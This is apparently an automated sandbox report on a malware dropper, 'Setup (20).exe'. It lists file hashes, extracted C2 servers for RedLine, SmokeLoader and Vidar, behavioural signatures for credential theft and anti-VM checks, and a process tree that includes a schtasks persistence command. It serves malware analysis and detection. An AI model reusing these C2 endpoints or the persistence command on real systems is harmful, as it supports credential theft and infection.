Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1773s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (20).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 37 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 42 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 33 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 23 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1316
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1872
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2680
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
            • Suspicious use of SetThreadContext
            PID:2560
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              • Modifies registry class
              PID:7116
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2424
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2372
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1448
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1348
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:912
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:8648
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                          2⤵
                            PID:4768
                            • C:\Windows\SysWOW64\schtasks.exe
                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                              3⤵
                              • Creates scheduled task(s)
                              PID:4400
                          • C:\Users\Admin\AppData\Roaming\crwjjcs
                            C:\Users\Admin\AppData\Roaming\crwjjcs
                            2⤵
                            • Drops file in System32 directory
                            • Drops file in Windows directory
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4792
                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            2⤵
                              PID:3732
                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              2⤵
                                PID:5236
                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                2⤵
                                  PID:8880
                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  2⤵
                                    PID:6900
                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    2⤵
                                      PID:1156
                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                      2⤵
                                        PID:2312
                                      • C:\Users\Admin\AppData\Roaming\crwjjcs
                                        C:\Users\Admin\AppData\Roaming\crwjjcs
                                        2⤵
                                        • Suspicious behavior: MapViewOfSection
                                        PID:4388
                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                        2⤵
                                          PID:8864
                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                          2⤵
                                            PID:8008
                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                            2⤵
                                              PID:8252
                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                              2⤵
                                                PID:624
                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                2⤵
                                                  PID:4436
                                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                  2⤵
                                                    PID:1936
                                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                    2⤵
                                                      PID:848
                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                      2⤵
                                                        PID:368
                                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                        2⤵
                                                          PID:5192
                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                          2⤵
                                                            PID:1276
                                                          • C:\Users\Admin\AppData\Roaming\crwjjcs
                                                            C:\Users\Admin\AppData\Roaming\crwjjcs
                                                            2⤵
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:8120
                                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                            2⤵
                                                              PID:7384
                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                              2⤵
                                                                PID:8400
                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                2⤵
                                                                  PID:2332
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                1⤵
                                                                  PID:1012
                                                                • C:\Users\Admin\AppData\Local\Temp\Setup (20).exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Setup (20).exe"
                                                                  1⤵
                                                                  • Checks computer location settings
                                                                  • Modifies system certificate store
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2116
                                                                  • C:\Users\Admin\Documents\LjwKmzM9NHzq7_dTiKjGuoiE.exe
                                                                    "C:\Users\Admin\Documents\LjwKmzM9NHzq7_dTiKjGuoiE.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2736
                                                                    • C:\Users\Admin\Documents\LjwKmzM9NHzq7_dTiKjGuoiE.exe
                                                                      "C:\Users\Admin\Documents\LjwKmzM9NHzq7_dTiKjGuoiE.exe"
                                                                      3⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:8644
                                                                  • C:\Users\Admin\Documents\NgrnhWRq_JpixO72pNw4ddFv.exe
                                                                    "C:\Users\Admin\Documents\NgrnhWRq_JpixO72pNw4ddFv.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2672
                                                                  • C:\Users\Admin\Documents\wKFWBYHZJmAezVOTN4YfFa9z.exe
                                                                    "C:\Users\Admin\Documents\wKFWBYHZJmAezVOTN4YfFa9z.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2476
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 764
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:4824
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 820
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:4460
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 824
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5304
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 748
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5512
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 956
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5568
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 996
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5604
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 1016
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5824
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 1400
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5284
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 1468
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5672
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 1352
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5804
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 1636
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:6688
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 900
                                                                      3⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Program crash
                                                                      PID:7132
                                                                  • C:\Users\Admin\Documents\Tp7vRW0lD6gVb9PQojYV3gaJ.exe
                                                                    "C:\Users\Admin\Documents\Tp7vRW0lD6gVb9PQojYV3gaJ.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:2472
                                                                  • C:\Users\Admin\Documents\0tldiPA_aoTv82sVoZAwhai5.exe
                                                                    "C:\Users\Admin\Documents\0tldiPA_aoTv82sVoZAwhai5.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1220
                                                                    • C:\Users\Admin\Documents\0tldiPA_aoTv82sVoZAwhai5.exe
                                                                      C:\Users\Admin\Documents\0tldiPA_aoTv82sVoZAwhai5.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4156
                                                                  • C:\Users\Admin\Documents\xdQH6bk2SUVrOh9v9NCI2A8z.exe
                                                                    "C:\Users\Admin\Documents\xdQH6bk2SUVrOh9v9NCI2A8z.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:3784
                                                                    • C:\Users\Admin\Documents\xdQH6bk2SUVrOh9v9NCI2A8z.exe
                                                                      C:\Users\Admin\Documents\xdQH6bk2SUVrOh9v9NCI2A8z.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4148
                                                                  • C:\Users\Admin\Documents\w208w8rFTxtjlVTMXokilXBC.exe
                                                                    "C:\Users\Admin\Documents\w208w8rFTxtjlVTMXokilXBC.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1572
                                                                  • C:\Users\Admin\Documents\z4hvHgXR0gfvabEvyVl5i2Yi.exe
                                                                    "C:\Users\Admin\Documents\z4hvHgXR0gfvabEvyVl5i2Yi.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1568
                                                                    • C:\Users\Admin\AppData\Roaming\5614312.exe
                                                                      "C:\Users\Admin\AppData\Roaming\5614312.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      PID:4636
                                                                    • C:\Users\Admin\AppData\Roaming\6364159.exe
                                                                      "C:\Users\Admin\AppData\Roaming\6364159.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4576
                                                                  • C:\Users\Admin\Documents\gJSz31MHj0FbLT04xI5CnRqR.exe
                                                                    "C:\Users\Admin\Documents\gJSz31MHj0FbLT04xI5CnRqR.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2912
                                                                    • C:\Users\Admin\Documents\gJSz31MHj0FbLT04xI5CnRqR.exe
                                                                      C:\Users\Admin\Documents\gJSz31MHj0FbLT04xI5CnRqR.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:4140
                                                                    • C:\Users\Admin\Documents\gJSz31MHj0FbLT04xI5CnRqR.exe
                                                                      C:\Users\Admin\Documents\gJSz31MHj0FbLT04xI5CnRqR.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4328
                                                                  • C:\Users\Admin\Documents\uS2qVwbBXStz4JJnMTbX9nBf.exe
                                                                    "C:\Users\Admin\Documents\uS2qVwbBXStz4JJnMTbX9nBf.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2280
                                                                  • C:\Users\Admin\Documents\TNnbB7qgCp3n2HrMIG8QBJhl.exe
                                                                    "C:\Users\Admin\Documents\TNnbB7qgCp3n2HrMIG8QBJhl.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2040
                                                                  • C:\Users\Admin\Documents\OpAFCEzgb6DTwUScBdw_AmXx.exe
                                                                    "C:\Users\Admin\Documents\OpAFCEzgb6DTwUScBdw_AmXx.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:1464
                                                                  • C:\Users\Admin\Documents\gxmpLGCnlqR4yrZ4zyOCpaBQ.exe
                                                                    "C:\Users\Admin\Documents\gxmpLGCnlqR4yrZ4zyOCpaBQ.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3696
                                                                  • C:\Users\Admin\Documents\xTT9G3cVWQIJB83Fe85KAQ3D.exe
                                                                    "C:\Users\Admin\Documents\xTT9G3cVWQIJB83Fe85KAQ3D.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:648
                                                                  • C:\Users\Admin\Documents\9gA9iRh9g5iIiF6FWoT7jKO9.exe
                                                                    "C:\Users\Admin\Documents\9gA9iRh9g5iIiF6FWoT7jKO9.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3324
                                                                  • C:\Users\Admin\Documents\uNoHa4E9h4pkSHHPT0rabmyg.exe
                                                                    "C:\Users\Admin\Documents\uNoHa4E9h4pkSHHPT0rabmyg.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2920
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 660
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4956
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 668
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:2128
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 684
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2504
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 672
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5024
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1120
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5708
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1112
                                                                      3⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Program crash
                                                                      PID:5896
                                                                  • C:\Users\Admin\Documents\s8JLhZcv7qUUPk7nlxBRUB5d.exe
                                                                    "C:\Users\Admin\Documents\s8JLhZcv7qUUPk7nlxBRUB5d.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:3840
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 660
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4964
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 708
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2300
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 684
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:3784
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 640
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:3944
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1120
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5680
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1172
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5736
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1072
                                                                      3⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Program crash
                                                                      PID:5868
                                                                  • C:\Users\Admin\Documents\lbMADeCf74trC0gC6XWj2ch7.exe
                                                                    "C:\Users\Admin\Documents\lbMADeCf74trC0gC6XWj2ch7.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2500
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TJ39N.tmp\lbMADeCf74trC0gC6XWj2ch7.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TJ39N.tmp\lbMADeCf74trC0gC6XWj2ch7.tmp" /SL5="$20208,138429,56832,C:\Users\Admin\Documents\lbMADeCf74trC0gC6XWj2ch7.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:4196
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-598C5.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-598C5.tmp\Setup.exe" /Verysilent
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:4268
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:4284
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 760
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:5604
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 812
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:3784
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 844
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:5672
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 776
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:6648
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 972
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:4536
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1004
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Program crash
                                                                            PID:6764
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1132
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:4988
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 808
                                                                            6⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:7704
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                          5⤵
                                                                            PID:4572
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2TOUF.tmp\Inlog.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2TOUF.tmp\Inlog.tmp" /SL5="$102CA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                              6⤵
                                                                                PID:3556
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-A438G.tmp\Setup.exe
